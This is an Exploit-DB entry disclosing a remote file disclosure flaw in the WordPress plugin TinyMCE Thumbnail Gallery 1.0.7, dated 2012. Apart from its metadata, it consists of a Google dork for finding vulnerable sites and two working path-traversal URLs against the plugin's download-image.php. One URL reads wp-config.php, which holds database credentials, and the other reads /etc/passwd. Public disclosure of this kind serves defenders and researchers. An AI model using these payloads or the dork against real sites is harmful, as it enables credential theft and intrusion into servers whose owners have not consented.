WordPress Plugin TinyMCE Thumbnail Gallery 1.0.7 - Remote File Disclosure

EDB-ID:

19022

CVE:



Platform:

PHP

Published:

2012-06-08

##################################################
# Description : Wordpress Plugins - Tinymce Thumbnail Gallery Remote 
File Disclosure Vulnerability
# Version : 1.0.7
# Link : http://wordpress.org/extend/plugins/tinymce-thumbnail-gallery/
# Plugins : 
http://downloads.wordpress.org/plugin/tinymce-thumbnail-gallery.zip
# Date : 25-05-2012
# Google Dork : inurl:/wp-content/plugins/tinymce-thumbnail-gallery/
# Author : Sammy FORGIT - sam at opensyscom dot fr - 
http://www.opensyscom.fr
##################################################


Exploit :

http://www.exemple.com/wordpress/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php

http://www.exemple.com/wordpress/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../../../../../etc/passwd